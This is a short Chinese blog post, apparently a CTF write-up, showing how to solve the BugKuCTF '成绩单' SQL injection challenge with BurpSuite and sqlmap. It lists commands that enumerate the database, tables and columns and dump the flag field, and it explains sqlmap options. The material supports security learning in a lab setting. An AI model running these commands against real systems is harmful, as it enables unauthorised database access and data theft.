CTF|sqlmap的简单使用

工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap
示例：BugKuCTF题成绩单

初步测试1

BurpSuite开启代理，随意输入一个id，BurpSuite导出为文件

image.png

拿出命令行，准备开撸
命令sqlmap -r 成绩单.txt -p id --current-db 获取当前数据库名称
参数说明

-r   加载一个文件 
-p  指定参数 
--current-db  获取数据库名称
此外
-u   指定url
 --method POST    POST方式，搭配 --data "id=1" 食用  
--cookie "id=1"       带上cookie
-threads                 指定线程数
--dbms                    指定数据库类型

拿到数据库名

命令sqlmap -r 成绩单.txt -p id -D skctf_flag --tables 获取指定数据库的表

-D       指定数据库名称 
--tables    列举数据库中的表

拿到表名

命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g --columns获取指定表的字段

image.png

命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump打印指定字段的内容

image.png

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

CTF|sqlmap的简单使用

推荐阅读更多精彩内容